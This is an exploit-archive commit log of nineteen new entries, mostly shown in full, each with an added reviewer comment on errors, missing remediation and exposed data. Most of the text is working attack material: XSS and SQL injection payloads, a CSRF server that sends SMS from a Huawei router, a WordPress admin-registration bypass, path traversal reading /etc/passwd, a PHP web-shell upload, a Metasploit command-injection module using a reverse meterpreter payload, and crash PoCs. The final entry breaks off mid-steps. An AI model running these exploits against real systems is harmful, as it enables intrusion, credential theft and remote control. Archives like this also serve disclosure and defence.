DB: 2019-01-08

19 changes to exploits/shellcodes

Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference
BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)

KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation

Mailcleaner - Authenticated Remote Code Execution (Metasploit)
Embed Video Scripts - Persistent Cross-Site Scripting
All in One Video Downloader 1.2 - Authenticated SQL Injection
LayerBB 1.1.1 - Persistent Cross-Site Scripting
MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting
phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting
Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation
MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection
Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal
Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection
Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
Offensive Security 2019-01-08 05:01:58 +00:00
parent e8dcb9f022
commit deaee53895
20 changed files with 1163 additions and 0 deletions

@ -0,0 +1,20 @@
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS
# Date: 21/12/2018
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Multiple
# CVE : CVE-2018-20326
#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user.
Reproduction Steps:
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
Step 2: Login as Username and Password
Step 3: After Login below url will be shown
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>)
Step 5: On execution of the payload, it will be popped up as "XSS-Saurav"
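
Review bot: The URLs in Steps 3 and 4 read "cgi-bin/webprocgetpage=html/index.html" with no "?" between the script name and the first parameter, so the request a defender would search logs for or write a filter rule against is not the one shown; confirm the captured URL and correct both lines. The description should also name the reflecting parameter (the payload is appended to "var:subpage") and state whether any firmware after W2001EN-00 fixes the issue, since the header gives no remediation.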

@ -0,0 +1,49 @@
# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
# Date: 01/07/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
# Version: 21.210.09.00.158
# Tested on: Windows 10 x64
# CVE: CVE-2014-5395
# Note: The administrator who opens the URL should be authenticated.
import socket
import time
server_ip = "0.0.0.0"
server_port = 80
huawei_ip = "192.168.8.1"
receiving_phone_no = "01234567890"
sms_text = "This is a SPAM text from Huawei E5330"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
</script>
</body>
</html>
""")
client.close()
sock.close()
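
Review bot: The header never states the root cause, which is visible only in the script body: the POST to "/api/sms/send-sms" is built with no anti-CSRF token or other per-session value, so any page the authenticated administrator opens can issue it. Add that as a description line together with the fixed firmware version, if one exists, since the CVE id is from 2014 while the entry is dated 01/07/2019 and readers need to know whether 21.210.09.00.158 is simply unpatched. The bare print statements also make the file Python 2 only, which the header should say.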

@ -0,0 +1,36 @@
# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# POC Video: https://youtu.be/2CFJLwkxpT8
# Vendor Homepage: https://codeawesome.in/embed/
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
# Demo Website: https://codeawesome.in/embed/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
A stored xss found in "Embed Video Scripts" comments section.
# POC Request:
:method: POST
:authority: server
:scheme: https
:path: /embed/comments
content-length: 145
accept: */*
origin: https://server
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
content-type: application/x-www-form-urlencoded; charset=UTF-8
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
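
Review bot: The captured request publishes what look like the researcher's own cookie values ("__cfduid", "_tccl_visitor", "_tccl_visit"); replace them with placeholders before this is archived, as was already done for the host ("server"). The "message" value also has an unbalanced quote in alert('Deyaa), "Tested on" reads "WIN7_x68", and "Version: N/A" leaves administrators unable to tell which releases are affected, so add the version or build date that was tested.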

@ -0,0 +1,20 @@
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: demo@aiovideodl.ml/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A
# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
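
Review bot: The header lines "Demo Admin Panel" and "Demo Admin Credentials" publish a login for the vendor's live demo site; drop both, since the finding is documented without them and the entry should not point readers at a third-party system. Because the injectable "id" parameter sits under "/admin/", the title should carry "Authenticated" as the commit listing does, and a line naming the expected fix (a parameterised query for "id") would make the entry usable for remediation.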

@ -0,0 +1,24 @@
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
# Version: 1.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17997
1. Description:
LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs).
2. Proof of Concept:
- Start a new conversation sending to any user (victim) you want
- Use a payload in the title <script>alert('XSS')</script>
- Next time the user (victim) visits the site payload will execute
3. Solution:
Update to 1.1.2
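
Review bot: The title says only "Cross-Site Scripting" while the proof of concept describes a stored issue (the payload is saved in a conversation title and runs when the recipient next visits), so use "Persistent" or "Stored" as the commit listing does. "Date: 10/4/2018" is ambiguous between April and October; an ISO date would remove the doubt. The description should also say on which page the title is rendered unescaped, so that users who cannot yet update to 1.1.2 know what to review.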

@ -0,0 +1,26 @@
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting
# Date: 12/31/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396
# Version: 1.8.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-3501
1. Description:
OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles.
2. Proof of Concept:
- Have a mod account level or higher
- Go to Manage Awards in ModCP
- Give an award to a user and input payload for reason <script>alert('XSS')</script>
- Payload executes when viewing award on awards.php and user profiles.
3. Solution:
Update to 1.8.19
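
Review bot: "Version: 1.8.3" and "Solution: Update to 1.8.19" do not obviously refer to the same product: the first is given as the plugin version, and the second is not labelled as either a plugin release or a MyBB core release. State which component has to be updated and to what version. The proof of concept needs a moderator account or higher, which belongs in the description as a precondition because it changes the severity.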

@ -0,0 +1,157 @@
##################################################################################################################################
# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities
# Date: 03.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmoadmin.com
# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip
# Version: 1.1.5
##################################################################################################################################
Introduction
phpMoAdmin - MongoDB GUI
MongoDB administration tool for PHP
Vulnerabilities: CSRF | XSS Reflected & Stored
CSRF details:
#################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="db" value="new.database"/>
<input type="text" name="newdb" value="testdb"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="dropDb"/>
<input type="text" name="db" value="testdb"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################
CSRF3
Repair Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="repairDb"/>
<input type="text" name="db" value="testdb"/>
<input type="submit" value="Repair DB"/>
</form>
</body>
</html>
#################################################################################
CSRF4
Add New Collection
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="createCollection"/>
<input type="text" name="db" value="testdb"/>
<input type="text" name="collection" value="testcollection"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>
#################################################################################
CSRF5
Drop Collection
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="dropCollection"/>
<input type="text" name="db" value="testdb"/>
<input type="text" name="collection" value="testcollection"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>
#################################################################################
XSS details:
#################################################################################
XSS1 | Reflected
URL
http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E
METHOD
Get
PARAMETER
db
PAYLOAD
<script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E
METHOD
Get
PARAMETER
newdb
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb
METHOD
Get
PARAMETER
collection
PAYLOAD
<script>alert(3)</script>
#################################################################################
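
Review bot: All five CSRF forms submit state-changing actions ("dropDb", "repairDb", "createCollection", "dropCollection") to moadmin.php with method="GET", but the write-up never says so in words, nor whether the tool expects any login or token before honouring them. Add a short root-cause line for the CSRF and for the three XSS parameters ("db", "newdb", "collection"), and a remediation section; as submitted the entry has no fixed version, no CVE field and no vendor-contact note. "Date: 03.01.2019" should be written unambiguously.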

@ -0,0 +1,54 @@
# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role
# Google Dork: inurl:/wp-content/plugins/userpro/
# Date: 3rd January, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage: https://userproplugin.com/
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: < 4.9.21
# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well
UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21
But there wasn't any POC available so this exploit demonstrates this
vulnerability.
https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt
From the changelog: "Security Fix : Registration role validation fix"
The latest version up to now is 4.9.29
The vulnerability allows anyone to register with Administrator role which
can easily be turned into RCE
Steps to reproduce:
1. Go to the registration form, input random fake values, trigger Burp
Suite and click submit.
2. The POST data will look similar to following
redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701=
USERNAME@EMAIL.COM
&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx
Here "-701" is a random postfix number and gets stripped at the server.
Other than that, the interesting values are
user_login
user_email
user_pass
user_pass_confirm
3. Adding following extra parameter in POST data will register the user
with Administrator privileges
role-701=administrator
So the modified POST data will look similar to following
role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip....
4. Forward the POST data in Burp Suite and you will get redirect to
/profile/ page with Administrator menu on top. Access /wp-admin/ to get to
the dashboard
5. Upload shell with default methods
@nomanriffat
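
Review bot: Step 3 shows the whole issue, that the registration handler accepts a client-supplied "role-701" field, but the text never states it as the root cause or tells site owners what to do beyond the changelog quote. Add a remediation line (update to 4.9.21 or later, then review the user list for administrator accounts created through the registration form) and a CVE line, even if it is "N/A". Step 5 ("Upload shell with default methods") is outside what is needed to demonstrate the registration flaw and can be dropped. The sample POST body in step 2 is also broken across three lines at "user_email-701=".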

@ -0,0 +1,34 @@
# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection
# Date: 03.01.2019
# Exploit Author: Mehmet Önder Key
# Vendor Homepage: https://manageyourteam.net/
# Software Link: https://sourceforge.net/projects/myt/
# Version: v1.5.1
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
MyT (Manage Your Team) - is a free open source task management and project
management system, based on Yii Framework, easy to use and with a great
perspective of growth for the future.
# Vulnerabilities:
# An attacker can access all data following an un/authorized user login
using the parameter.
# POC - SQL Injection :
# Parameter: Charge[group_total](POST)
# Request URL: /charge/admin
# Type : Error Based
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND
EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT
(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid
# Type : Time-Based Blind
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM
(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid
# Type : Stacked Queries
# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT
SLEEP(5)#&Charge_page=1&ajax=charge-grid
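
Review bot: The vulnerability line "An attacker can access all data following an un/authorized user login" does not say whether the request to "/charge/admin" needs a session, and the three payload blocks give no cookie or role, so the precondition cannot be judged; state it explicitly. The entry also has no remediation or fixed-version line and no CVE field. The payload lines are hard-wrapped in mid-expression, which makes the recorded request ambiguous for anyone writing a detection rule from it.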

@ -0,0 +1,177 @@
======================================================================
Exploit Title:: Multiple Vulnerabilities
Software: Roxy Fileman
Version: 1.4.5
Vendor Homepage: http://www.roxyfileman.com/
Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php
CVE number: CVE-2018-20525, CVE-2018-20526
Found: 2018-12-07
Tested on: PHP 7.0, Ubuntu 16.04 LTS
Author: Pongtorn Angsuchotmetee, Vittawat Masaree
SnoopBees Lab
https://www.snoopbees.com
=======================================================================
Description
===============================================================
Roxy Fileman is free open source file browser for .NET and PHP, ready for
use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily
integrated into a CMS or any other web application. Fileman is based on
JQuery and JQueryUI libraries and it's compatible with all modern browsers
- Internet Explorer, Firefox, Google Chrome, Safary and Opera.
Roxy Fileman is designed to be as flexible as possible. The client
interface is completely separated from the server-side logic and scripts,
thus can be used with any server programming language - PHP, ASP .NET,
Python, Cold Fusion etc. All data exchanged including configuration and
language files is in light weight JSON format. Great performance - all data
from the server is loaded using Ajax without page reloading. Fileman has
ready to use distributions for PHP and .NET. All client-server
communications and configuration files are in JSON format and are language
independent. See custom server side scripts.
Ref: http://www.roxyfileman.com/
Vulnerability
==================================
1. Path Traversal (CVE-2018-20525)
2. Unrestricted File Upload (CVE-2018-20526)
==================================
Proof of Concept
===========================
1) Path Traversal (CVE-2018-20525)
==================================
The vulnerability affected file “copydir.php", “copyfile.php",
“fileslist.php". It is we can manipulating variables that reference files
with “dot-dot-slash (../)” to access arbitrary files and directories
access on file system. After copied the system file will appear on Roxy
file manager “http://[IP-Address]/fileman/Uploads".
#################################################
----------------------------------------------------------------------------------
1.1. copydir.php
POST /fileman/php/copydir.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/
----------------------------------------------------------------------------------
1.2. copyfile.php
POST /fileman/php/copyfile.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type=
----------------------------------------------------------------------------------
1.3. filelist.php
POST /fileman/php/fileslist.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type=
##############################################################
============================
2) Unrestricted File Upload (CVE-2018-20526)
==================================
The vulnerability affected file upload.php and in the condition that the
php.ini file need have add the “*AddHandler php7-script .php*”. And now we
can upload the shell code file to the server by double extension such
as *shellcode.php.png
*
--------------------------------------------------------------------------------------------------------------------
POST /fileman/php/upload.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: multipart/form-data;
boundary=---------------------------67141620012509
Content-Length: 547
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads;
roxyview=list
-----------------------------67141620012509
Content-Disposition: form-data; name="action"
upload
-----------------------------67141620012509
Content-Disposition: form-data; name="method"
ajax
-----------------------------67141620012509
Content-Disposition: form-data; name="d"
/fileman/Uploads
-----------------------------67141620012509
Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*"
Content-Type: image/png
*<?php system($_GET[cmd]); ?> *
-----------------------------67141620012509--
-------------------------------------------------------------------------------------------------------------------------------------------
Timeline
==================================
2018-12-07: Discovered the bug
2018-12-11: Reported to vendor (The vendor is unresponsive)
2018-12-19: Reported to vendor (The vendor is unresponsive)
2018-12-27: Request CVE
2019-01-03: Advisory published
Discovered By:
=====================
Pongtorn Angsuchotmetee, Vittawat Masaree
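
Review bot: Section 2 gives the precondition as the php.ini file containing "AddHandler php7-script .php", but AddHandler is an Apache httpd directive, not a php.ini setting, so the stated configuration file is wrong; name the httpd configuration or .htaccess instead, because that directive is exactly what administrators should look for. The heading "1.3. filelist.php" differs from the path it requests ("/fileman/php/fileslist.php"), and the asterisks around values in the request bodies and the upload filename look like mail-client emphasis markers rather than request data; mark or strip them. A remediation section is missing, and the timeline records the vendor as unresponsive, so state explicitly whether any fixed release exists.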

exploits/python/remote/46075.rb Executable file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Mailcleaner Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
operating system command under the context of the web server user which is root.
/admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python', 'unix'],
'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
'Targets' =>
[
[
'Python payload',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
}
],
[
'Command payload',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "\x26",
}
}
]
],
'Privileged' => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with'])
]
)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def auth
print_status('Performing authentication...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin/')
})
if res && !res.get_cookies.empty?
cookie = res.get_cookies
else
fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
end
# Performing authentication
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin/'),
'cookie' => cookie,
'vars_post' => {
'username' => username,
'password' => password,
'submit' => 'Log+in'
}
})
if res && res.code == 302
print_good("Awesome..! Authenticated with #{username}:#{password}")
else
fail_with(Failure::NoAccess, 'Credentials are not valid.')
end
cookie
end
def exploit
cookie = auth
if cookie.nil?
fail_with(Failure::Unknown, 'Something went wrong!')
end
print_status('Exploiting command injection flaw')
if target['Arch'] == ARCH_PYTHON
cmd = "';$(python -c \"#{payload.encoded}\");#"
else
cmd = "';#{payload.encoded};#"
end
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
'cookie' => cookie,
'vars_post' => {
'search' => rand_text_alpha(5),
'domain' => cmd,
'submit' => 1
}
})
end
end
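
Review bot: 'Privileged' is set to false although the module description says commands run "under the context of the web server user which is root"; the two should agree. In auth, print_good writes the password to the console in clear ("Authenticated with #{username}:#{password}"), which ends up in operator logs and screenshots; print the username only. The module has no check method, the references carry only a blog URL with no CVE or fixed version, and a Ruby module is filed under exploits/python/remote/, which is worth a comment in the header.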

@ -0,0 +1,51 @@
<!--
# Exploit Title: Microsoft Edge 44.17763.1.0 NULL Pointer Dereference. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-14
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 44.17763.1.0 (Microsoft EdgeHTML 18.17763)
# Tested on: Windows 10 x64
# CVE : N/A
# Description:
# Access violation while reading memory at 0x2D0 using a NULL ptr edgehtml!CSelectElement::SetItem+0x190
# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19625211/
PoC.html
-->
<html>
<head>
<script>
function f1() {
try {var v1 = eventhandler1; } catch(e) { }
var v2 = document.createElementNS("http://www.w3.org/2000/svg", “pattern”);
v2.addEventListener("1", v1);
var v3 = document.createElement(“option”);
var v4 = document.createElement(“select”);
v4[4] = v3;
}
</script>
</head>
<body onload=f1()>
</body>
</html>
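
Review bot: In f1 the string arguments “pattern”, “option” and “select” are wrapped in typographic quotes while the namespace URL on the same line uses ASCII quotes, so the file has been through a word processor and no longer matches what was tested; restore the original bytes from the submission. The header lists "CVE : N/A" but links a Microsoft platform issue (19625211); record whether that issue was closed with a fix and in which build, so readers know whether 44.17763.1.0 is still the latest affected version. eventhandler1 is never defined, which deserves a one-line comment if it is intentional.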

exploits/windows/dos/46087.py Executable file

@ -0,0 +1,25 @@
# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested Version: 1.7.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python BlueAuditor_1.7.2.0.py
# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard
# 3.- Open BlueAuditor
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("BlueAuditor_1.7.2.0.txt", "w")
f.write(buffer)
f.close()
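
Review bot: The "#!/usr/bin/env python" line sits after the comment header, where it is an ordinary comment and has no effect; move it to line 1 or delete it. The header records the result only as "Crashed", with no exception code, faulting module or debugger output, so a reader cannot tell an unhandled exception from memory corruption or decide how urgently to act; add the crash details and whether the vendor was contacted.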

exploits/windows/dos/46088.py Executable file

@ -0,0 +1,25 @@
# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested Version: 2.4.2
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py
# 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard
# 3.- Open SpotFTP
# 4.- Register -> Enter Registration Code...
# 5.- Paste ClipBoard on "Name:"
# 6.- Key: -> L4M5
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w")
f.write(buffer)
f.close()
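
Review bot: Step 3 says "Open SpotFTP" although the product named in the title and the download link is SpotFTP Password Recover; name the application as installed. "Crashed" in step 8 is the only evidence given, with no exception code or faulting module, and the shebang follows the comment block where it has no effect; add the crash details and move or remove the shebang.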

exploits/windows/dos/46089.py Executable file

@ -0,0 +1,30 @@
# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python FoscamVMS_1.1.4.9.py
# 2.- Open FoscamVMS_1.1.4.9.txt and copy content to clipboard
# 3.- Open FoscamVMS
# 4.- User Name -> admin
# 5.- Password ->
# 6.- Login
# 7.- System Settings
# 8.- User Management Settings
# 9.- Add
# 10.- Paste ClipBoard on "Username"
# 11.- Password -> P4ssw0rd
